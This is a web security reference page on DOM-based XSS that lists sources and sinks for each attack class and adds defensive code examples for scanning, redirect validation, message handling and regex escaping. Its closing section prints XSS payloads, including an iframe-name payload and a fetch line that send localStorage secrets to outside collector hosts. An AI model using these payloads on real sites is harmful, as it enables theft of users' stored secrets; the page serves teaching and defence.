DOM XSS

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

DOM vulnerabilities

DOM vulnerabilities occur when data from attacker-controlled Sources (such as location.search, document.referrer, or document.cookie) is moved unsafely into Sinks. Sinks are functions or objects (e.g., eval(), document.body.innerHTML) that can execute or render dangerous content if they are handed malicious data.

  • Sources are inputs an attacker can control, including URLs, cookies, and web messages.
  • Sinks are dangerous endpoints where malicious data can cause harmful effects, such as script execution.

The risk arises when data flows from a source to a sink without proper validation or sanitization, which opens the door to attacks such as XSS.

Tip

You can find a more up-to-date list of sources and sinks at https://github.com/wisec/domxsswiki/wiki

Common sources:

document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database

Common Sinks (grouped by the attack class each sink enables; every class is detailed under Examples below):

Open redirect: location, location.host, location.hostname, location.href, location.pathname, location.search, location.protocol, location.assign(), location.replace(), open(), domElem.srcdoc, XMLHttpRequest.open(), XMLHttpRequest.send(), jQuery.ajax(), $.ajax()
JavaScript injection: eval(), Function() constructor, setTimeout(), setInterval(), setImmediate(), execCommand(), execScript(), msSetImmediate(), range.createContextualFragment(), crypto.generateCRMFRequest()
DOM XSS (HTML injection): someDOMElement.innerHTML, someDOMElement.outerHTML, someDOMElement.insertAdjacentHTML, someDOMElement.onevent, document.write(), document.writeln()
DOM-data manipulation: scriptElement.src, scriptElement.text, scriptElement.textContent, scriptElement.innerText, someDOMElement.setAttribute(), someDOMElement.search, someDOMElement.text, someDOMElement.textContent, someDOMElement.innerText, someDOMElement.outerText, someDOMElement.value, someDOMElement.name, someDOMElement.target, someDOMElement.method, someDOMElement.type, someDOMElement.backgroundImage, someDOMElement.cssText, someDOMElement.codebase, document.title, document.implementation.createHTMLDocument(), history.pushState(), history.replaceState()
jQuery: add(), after(), append(), animate(), insertAfter(), insertBefore(), before(), html(), prepend(), replaceAll(), replaceWith(), wrap(), wrapInner(), wrapAll(), has(), constructor(), init(), index(), jQuery.parseHTML(), $.parseHTML()
Ajax request manipulation: XMLHttpRequest.setRequestHeader(), XMLHttpRequest.open(), XMLHttpRequest.send(), jQuery.globalEval(), $.globalEval()
Local file-path manipulation: FileReader.readAsArrayBuffer(), FileReader.readAsBinaryString(), FileReader.readAsDataURL(), FileReader.readAsText(), FileReader.readAsFile(), FileReader.root.getFile()
Link manipulation: someDOMElement.href, someDOMElement.src, someDOMElement.action
HTML5-storage manipulation: sessionStorage.setItem(), localStorage.setItem()
XPath injection: document.evaluate(), someDOMElement.evaluate()
Client-side JSON injection: JSON.parse(), jQuery.parseJSON(), $.parseJSON()
Document-domain manipulation: document.domain
Cookie manipulation: document.cookie
Denial of service: requestFileSystem(), RegExp()
Web-message manipulation: postMessage()
WebSocket-URL poisoning: WebSocket
Client-side SQL injection: executeSql()

The innerHTML sink does not execute script elements in any modern browser, and svg onload is not a dependable trigger there either, so use alternative elements whose handlers fire on insertion, such as img (with onerror) or iframe.

This kind of XSS is probably the hardest to find: you need to read the JS code, check whether it uses any object whose value you control, and if so, look for a way to abuse that flow to execute arbitrary JS.
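Because finding DOM XSS means reading the JavaScript for source-to-sink flows, here is an added example (not part of the original page) of a small triage scanner in Node.js. Its source and sink patterns are a subset of the lists above, the sample code it scans is constructed for illustration, and it is a reading aid rather than a real taint tracker: it only flags a source that appears after a sink in the same statement, and separately lists every sink so the indirect flows (data parked in a variable first) can be traced by hand.

```javascript
// Added example: regex-based source/sink triage for client-side JS.
// Not from the original page; patterns cover a subset of the lists above.

// Attacker-controlled sources (subset of the page's list).
const SOURCES = [
  /\blocation(\.(search|hash|href|pathname))?\b/,
  /\bdocument\.(URL|documentURI|URLUnencoded|baseURI|referrer|cookie)\b/,
  /\bwindow\.name\b/,
  /\b(localStorage|sessionStorage)\.getItem\s*\(/,
  /\b(event|e|msg)\.data\b/,                      // postMessage payloads
];

// Dangerous sinks (subset). Assignment sinks use =(?!=) so that a
// comparison such as `location.href == x` is not reported.
const SINKS = [
  /\.(innerHTML|outerHTML|srcdoc)\s*=(?!=)/,
  /\.insertAdjacentHTML\s*\(/,
  /\bdocument\.write(ln)?\s*\(/,
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  // setTimeout/setInterval only matter with a string argument; skip
  // the common function / arrow-function forms.
  /\bset(Timeout|Interval)\s*\((?!\s*(function\b|\(|[\w$]+\s*=>))/,
  /\blocation(\.href|\.assign|\.replace)?\s*(=(?!=)|\()/,
  /\bwindow\.open\s*\(/,
  /\.(html|append|prepend|after|before|replaceWith)\s*\(/,   // jQuery
  /\bdocument\.(cookie|domain)\s*=(?!=)/,
  /\bnew\s+(WebSocket|RegExp)\s*\(/,
  /\bJSON\.parse\s*\(/,
  /\.postMessage\s*\(/,
];

// Scan JS source text. Returns direct flows (source after sink in one
// statement) and every statement that touches a sink. Statements are
// split naively on ';' and newlines, which is enough for triage.
function scanSource(src) {
  const flows = [];
  const sinks = [];
  src.split('\n').forEach((lineText, i) => {
    const line = i + 1;
    if (/^\s*\/\//.test(lineText)) return;       // comment-only line
    for (const rawStmt of lineText.split(';')) {
      const stmt = rawStmt.trim();
      if (!stmt) continue;
      for (const sinkRe of SINKS) {
        const sinkMatch = sinkRe.exec(stmt);
        if (!sinkMatch) continue;
        sinks.push({ line, sink: sinkMatch[0].trim(), stmt });
        for (const srcRe of SOURCES) {
          for (const m of stmt.matchAll(new RegExp(srcRe.source, 'g'))) {
            if (m.index > sinkMatch.index) {
              flows.push({ line, sink: sinkMatch[0].trim(), source: m[0], stmt });
            }
          }
        }
      }
    }
  });
  return { flows, sinks };
}

// Constructed sample, not real application code.
const SAMPLE = `// constructed sample, not real application code
const params = new URLSearchParams(location.search);
document.getElementById('greet').innerHTML = 'Hi ' + params.get('name');
document.write('<a href="' + document.referrer + '">back</a>');
setTimeout(location.hash.slice(1), 0);
if (location.href == 'https://example.test/') { init(); }
el.textContent = location.hash;`;

const report = scanSource(SAMPLE);
for (const f of report.flows) console.log(`FLOW line ${f.line}: ${f.source} -> ${f.sink} | ${f.stmt}`);
for (const s of report.sinks) console.log(`SINK line ${s.line}: ${s.sink} | ${s.stmt}`);
```

On the sample, lines 4 and 5 are reported as direct flows (document.referrer into document.write, location.hash into a string-argument setTimeout), while line 3 is listed only as a sink: the location.search value reaches innerHTML through the params variable, which is exactly the kind of indirection the paragraph above says you have to follow by hand. Line 6 is silent because the comparison is not a write, and line 7 because textContent is not an HTML sink.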

Tools to find them

Examples

Open Redirect

From: https://portswigger.net/web-security/dom-based/open-redirection

Open redirect vulnerabilities in the DOM occur when a script writes data that an attacker can control into a sink capable of initiating navigation across domains.

It is crucial to understand that executing arbitrary code, such as javascript:alert(1), is possible if you control the start of the URL that the redirection uses, so a check on the redirect target has to validate the scheme and origin rather than look for a substring.

Sinks:

location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
domElem.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()
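As an added example (not code from the original page), here is the usual vulnerable pattern of echoing a ?next= parameter into location.href next to a hardened check that uses the browser's own URL parser. SITE_ORIGIN and the probe values are assumptions for the demonstration; the code runs in Node.js, which provides the same WHATWG URL class as browsers.

```javascript
// Added example, not code from the original page. Models the pattern
//   location.href = new URLSearchParams(location.search).get('next');
// SITE_ORIGIN is an assumed value for the application's own origin.
const SITE_ORIGIN = 'https://app.example';

// Vulnerable: the attacker-supplied string reaches the location sink
// unchanged, so ?next=javascript:alert(1) runs script in the page's origin
// and ?next=//evil.example sends the user off-site.
function redirectTargetUnsafe(next) {
  return next;
}

// Hardened: parse the value relative to our own origin, then require that
// the resulting origin (scheme + host + port) is exactly ours. Parsing
// catches forms a substring check misses: "//evil.example",
// "\\evil.example" (backslashes become slashes in special URLs),
// "https://app.example.evil", and "javascript:" or "data:" URLs, whose
// origin serialises as the opaque string "null".
function redirectTargetSafe(next, fallback = '/') {
  let parsed;
  try {
    parsed = new URL(next, SITE_ORIGIN);
  } catch {
    return fallback;                   // unparseable: go somewhere known-good
  }
  if (parsed.origin !== SITE_ORIGIN) {
    return fallback;
  }
  // Re-serialise only path, query and fragment instead of echoing the
  // original string, so what reaches location.href is always same-origin.
  return parsed.pathname + parsed.search + parsed.hash;
}

// Constructed inputs an attacker might place in ?next=
const PROBES = [
  '/account?tab=2',
  '//evil.example/',
  'javascript:alert(1)',
  'https://app.example.evil/',
  '\\\\evil.example/',
];
for (const p of PROBES) {
  console.log(JSON.stringify(p), '->', redirectTargetSafe(p));
}
```

The same parse-then-compare approach applies to the WebSocket constructor listed later on this page (allow only wss: and your own host) and to the automation-bot case at the end: an allowlist on the parsed scheme rejects javascript: before any navigation happens.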

Cookie manipulation

From: https://portswigger.net/web-security/dom-based/cookie-manipulation

DOM-based cookie-manipulation vulnerabilities occur when a script writes attacker-controllable data into the value of a cookie. This can cause unexpected behaviour of the web page if the cookie is used within the site. It can also be used to perform a session fixation attack if the cookie is involved in tracking user sessions. The primary sink related to this vulnerability is:

Sinks:

document.cookie

JavaScript Injection

From: https://portswigger.net/web-security/dom-based/javascript-injection

DOM-based JavaScript injection vulnerabilities occur when a script executes data that an attacker can control as JavaScript code.

Sinks:

eval()
Function() constructor
setTimeout()
setInterval()
setImmediate()
execCommand()
execScript()
msSetImmediate()
range.createContextualFragment()
crypto.generateCRMFRequest()

Document-domain manipulation

From: https://portswigger.net/web-security/dom-based/document-domain-manipulation

Document-domain manipulation vulnerabilities occur when a script sets the document.domain property using data that an attacker can control.

The document.domain property plays a central role in how browsers enforce the same-origin policy. When two pages from different origins set their document.domain to the same value, they can interact without restrictions. Although browsers impose some limits on the values that can be assigned to document.domain, preventing values completely unrelated to the page's origin, there are exceptions: typically, browsers allow child or parent domains. Note that current Chromium releases make document.domain immutable by default (pages are origin-keyed unless the server opts out with an Origin-Agent-Cluster: ?0 header), so this class mostly matters for legacy deployments.

Sinks:

document.domain

WebSocket-URL poisoning

From: https://portswigger.net/web-security/dom-based/websocket-url-poisoning

WebSocket-URL poisoning occurs when a script uses attacker-controllable data as the target URL of a WebSocket connection.

Sinks:

The WebSocket constructor can lead to WebSocket-URL poisoning vulnerabilities.

Link manipulation

From: https://portswigger.net/web-security/dom-based/link-manipulation

DOM-based link-manipulation vulnerabilities occur when a script writes attacker-controllable data to a navigation target within the current page, such as a clickable link or the submission URL of a form.

Sinks:

someDOMElement.href
someDOMElement.src
someDOMElement.action

Ajax request manipulation

From: https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation

Ajax request manipulation vulnerabilities occur when a script writes attacker-controllable data into an Ajax request that is sent using the XMLHttpRequest object.

Sinks:

XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.globalEval()
$.globalEval()

Local file-path manipulation

From: https://portswigger.net/web-security/dom-based/local-file-path-manipulation

Local file-path manipulation vulnerabilities occur when a script passes attacker-controllable data to a file-handling API as the filename parameter. An attacker can exploit this to construct a URL that, if visited by another user, causes the user's browser to open or write an arbitrary local file.

Sinks:

FileReader.readAsArrayBuffer()
FileReader.readAsBinaryString()
FileReader.readAsDataURL()
FileReader.readAsText()
FileReader.readAsFile()
FileReader.root.getFile()

Client-side SQL injection

From: https://portswigger.net/web-security/dom-based/client-side-sql-injection

Client-side SQL-injection vulnerabilities occur when a script incorporates attacker-controllable data into a client-side SQL query in an unsafe way. The executeSql() sink belongs to Web SQL, which has been removed from current Chromium releases, so you will mostly meet it in legacy code.

Sinks:

executeSql()

HTML5-storage manipulation

From: https://portswigger.net/web-security/dom-based/html5-storage-manipulation

HTML5-storage manipulation vulnerabilities occur when a script stores attacker-controllable data in the web browser's HTML5 storage (localStorage or sessionStorage). Although this action is not in itself a security vulnerability, it becomes a problem if the application later reads the stored data and processes it in an unsafe way. This lets an attacker use the storage mechanism to deliver other DOM-based attacks, such as cross-site scripting and JavaScript injection.

Sinks:

sessionStorage.setItem()
localStorage.setItem()

XPath injection

From: https://portswigger.net/web-security/dom-based/client-side-xpath-injection

DOM-based XPath-injection vulnerabilities occur when a script incorporates attacker-controllable data into an XPath query.

Sinks:

document.evaluate()
someDOMElement.evaluate()

Client-side JSON injection

From: https://portswigger.net/web-security/dom-based/client-side-json-injection

DOM-based JSON-injection vulnerabilities occur when a script incorporates attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application.

Sinks:

JSON.parse()
jQuery.parseJSON()
$.parseJSON()

Web-message manipulation

From: https://portswigger.net/web-security/dom-based/web-message-manipulation

Web-message vulnerabilities occur when a script sends attacker-controllable data as a web message to another document within the browser. An example of vulnerable web-message manipulation can be found in PortSwigger's Web Security Academy.

Sinks:

The postMessage() method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.
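As an added example (not from the original page), the two handlers below show the receiving side of a web message, which is where the damage happens: one trusts event.data as JSON and HTML, the other checks event.origin against an exact allowlist, tolerates malformed JSON, validates the shape of the object, and writes text rather than HTML. They take the event object as a parameter so they can be exercised without a browser; the allowlist, the fake element and the two constructed events are assumptions for the demonstration. This also serves as the example for the JSON.parse sink in the Client-side JSON injection section above.

```javascript
// Added example, not code from the original page. Assumed allowlist of
// origins permitted to post messages to this document.
const TRUSTED_ORIGINS = new Set(['https://app.example', 'https://widget.example']);

// Vulnerable handler for window.addEventListener('message', ...): any page
// that can reach this window (its opener, or a page embedding it in an
// iframe) can post a message, and the handler treats event.data as trusted.
// JSON.parse here is the client-side JSON injection sink; innerHTML is the
// DOM XSS sink that the parsed object then feeds.
function handleMessageUnsafe(event, target) {
  const msg = JSON.parse(event.data);
  target.innerHTML = msg.html;
  return msg;
}

// Hardened handler: exact origin comparison (never .includes/.startsWith,
// which "https://app.example.evil" would satisfy), safe parsing, a strict
// shape check, and textContent instead of innerHTML.
function handleMessageSafe(event, target) {
  if (!TRUSTED_ORIGINS.has(event.origin)) return null;
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch {
    return null;                                   // malformed JSON is ignored
  }
  if (!msg || typeof msg !== 'object' || msg.type !== 'greet' || typeof msg.name !== 'string') {
    return null;                                   // unexpected shape is ignored
  }
  target.textContent = 'Hello, ' + msg.name;       // rendered as text, not markup
  return { type: 'greet', name: msg.name };
}

// Constructed stand-in for a DOM element so the handlers run in Node.js.
function fakeElement() {
  return { innerHTML: '', textContent: '' };
}

// Constructed events: what an attacker page sends with
// victimWindow.postMessage(JSON.stringify({...}), '*'), and a legitimate one.
const hostile = {
  origin: 'https://evil.example',
  data: JSON.stringify({ html: '<img src=x onerror=alert(document.domain)>' }),
};
const friendly = {
  origin: 'https://widget.example',
  data: JSON.stringify({ type: 'greet', name: '<b>Mallory</b>' }),
};

const victim = fakeElement();
handleMessageUnsafe(hostile, victim);
console.log('unsafe handler wrote:', victim.innerHTML);
const guarded = fakeElement();
console.log('safe handler result for hostile message:', handleMessageSafe(hostile, guarded));
console.log('safe handler result for friendly message:', handleMessageSafe(friendly, guarded), guarded.textContent);
```

When reviewing a real listener, look for the three things the hardened version does: the origin check exists and is an equality test, the parser failure path does not fall through, and the data reaches a text or attribute-safe sink. A handler registered with a '*' target origin on the sending side is the mirror problem: the page leaks its message to whatever window happens to be there.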

DOM-data manipulation

From: https://portswigger.net/web-security/dom-based/dom-data-manipulation

DOM-data manipulation vulnerabilities occur when a script writes attacker-controllable data to a field within the DOM that is used in the visible UI or in client-side logic. An attacker can exploit this to construct a URL that, if visited by another user, changes the appearance or behaviour of the client-side UI.

Sinks:

scriptElement.src
scriptElement.text
scriptElement.textContent
scriptElement.innerText
someDOMElement.setAttribute()
someDOMElement.search
someDOMElement.text
someDOMElement.textContent
someDOMElement.innerText
someDOMElement.outerText
someDOMElement.value
someDOMElement.name
someDOMElement.target
someDOMElement.method
someDOMElement.type
someDOMElement.backgroundImage
someDOMElement.cssText
someDOMElement.codebase
document.title
document.implementation.createHTMLDocument()
history.pushState()
history.replaceState()

Denial of Service

From: https://portswigger.net/web-security/dom-based/denial-of-service

DOM-based denial-of-service vulnerabilities occur when a script unsafely passes attacker-controllable data to a problematic platform API. This includes APIs that, when invoked, can cause the user's computer to consume excessive amounts of CPU or disk space. Such vulnerabilities can have serious side effects, such as the browser restricting the website's functionality by refusing attempts to store data in localStorage or by terminating busy scripts.

Sinks:

requestFileSystem()
RegExp()
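As an added example (not from the original page), here is the RegExp() sink in its vulnerable and hardened forms. When the attacker chooses the pattern, a value such as (a+)+$ applied to a long non-matching string makes the backtracking regex engine do exponential work and hang the page; escaping the input turns it into a literal that can only match itself. The item list and search terms are constructed for the demonstration.

```javascript
// Added example, not code from the original page. Models a client-side
// filter such as  new RegExp(new URLSearchParams(location.search).get('q')).

// Escape every regex metacharacter so the input is matched literally.
function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Vulnerable: the attacker controls the pattern. Besides catastrophic
// backtracking (e.g. q=(a+)+$), metacharacters also change the semantics,
// so "a.b" matches "axb".
function filterUnsafe(items, pattern) {
  const re = new RegExp(pattern, 'i');
  return items.filter((x) => re.test(x));
}

// Hardened: the input can only ever match itself as a substring, and
// because the escaped pattern has no quantifiers it matches in linear time.
function filterSafe(items, pattern) {
  const re = new RegExp(escapeRegExp(pattern), 'i');
  return items.filter((x) => re.test(x));
}

// Constructed data for the demonstration.
const ITEMS = ['a.b', 'axb', 'report-2024.pdf', 'notes.txt'];
console.log('unsafe "a.b":', filterUnsafe(ITEMS, 'a.b'));
console.log('safe   "a.b":', filterSafe(ITEMS, 'a.b'));
console.log('escaped ReDoS pattern:', escapeRegExp('(a+)+$'));
```

The escaped pattern is what should reach the RegExp() sink; if the feature genuinely needs user-supplied regular expressions, the remaining defences are a length cap on the pattern and running the match in a Web Worker that can be terminated.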

DOM Clobbering

Undeclared globals & window.name abuse

A reference to name without a declaration (var/let/const) resolves to window.name. Because window.name persists across cross-origin navigations, an attacker can pre-populate the name of a browsing context with HTML/JS and later have the victim's code treat it as trusted data:

  • Open/redirect the target inside a context whose name you control:
<iframe name="<img src=x onerror=fetch('https://oast/?f='+btoa(localStorage.flag))>" src="https://target/page"></iframe>
  • Or reuse window.open with a crafted target name:
window.open('https://target/page', "<svg/onload=alert(document.domain)>")

If the application later does element.innerHTML = name (or uses a similar sink) without sanitization, the attacker-controlled window.name string is rendered in the target origin, giving DOM XSS and access to same-origin storage.

Admin/automation flows: pre-seeded storage & javascript: navigation

Automation bots (e.g., Playwright) often visit an internal page first, seed secrets into localStorage/cookies, and then navigate to user-supplied URLs. Any DOM XSS primitive (including window.name abuse) in that flow can exfiltrate the seeded secret:

fetch('https://webhook.site/<id>?flag=' + encodeURIComponent(localStorage.getItem('flag')))

If the bot does not restrict schemes, supplying a javascript: URL (javascript:fetch(...)) runs in the current origin without a fresh navigation, leaking the storage values directly.
